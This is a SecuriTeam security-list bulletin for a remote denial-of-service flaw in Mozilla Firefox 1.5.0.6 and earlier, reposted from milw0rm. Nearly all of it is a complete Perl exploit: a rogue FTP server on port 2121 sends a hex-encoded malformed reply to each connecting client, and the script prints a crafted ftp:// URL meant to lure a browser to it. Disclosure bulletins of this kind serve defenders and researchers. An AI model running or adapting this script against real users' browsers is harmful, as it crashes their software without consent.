[EXPL] Mozilla Firefox FTP Request Remote DoS (Exploit)

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Mozilla Firefox FTP Request Remote DoS (Exploit)

SUMMARY

<http://www.mozilla.com/firefox/> Mozilla Firefox is a free, open source,
cross-platform, graphical web browser developed by the Mozilla Corporation
and hundreds of volunteers.

There is a vulnerability in Mozilla Firefix that can result in a denial of
service condition.

DETAILS

Vulnerable Systems:
* Mozilla Firefox version 1.5.0.6 and prior.

#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload =
"\x32\x32\x30\x20\x5a\x0d\x0a\x33".
"\x33\x31\x20\x5a\x0d\x0a\x35\x30".
"\x30\x20\x44\x6f\x53\x0d\x0a\x35\".
"x30\x30\x20\x5a\x0d\x0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";;

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
# find out who connected
my ($client_port, $client_ip) = sockaddr_in($client_addr);
my $client_ipnum = inet_ntoa($client_ip);
my $client_host = gethostbyaddr($client_ip, AF_INET);
print ": $client_host", "[$client_ipnum]\n";
# send them a message, close connection
print CLIENT $payload;
close CLIENT;
}

ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/2244>
http://www.milw0rm.com/exploits/2244

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] Buffer Overflow in Mozilla Browser Firefox (Heap Corruption)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... corruption in the Mozilla browser as well as in Mozilla Firefox, ... The vulnerability specifically exists in string handling functions, ... pointing at a known memory location. ...
    (Securiteam)
  • [EXPL] TinyWeb Server DoS Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] SquirrelMail Cross Site Scripting in Encoded Text
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SquirrelMail has all the functionality you would want from an email ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] Liferay Cross Site Scripting Flaw
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Multiple Extensions Vulnerability in phpBB Attachment Mod
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... This is vulnerability is caused by Apache's MIME module ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)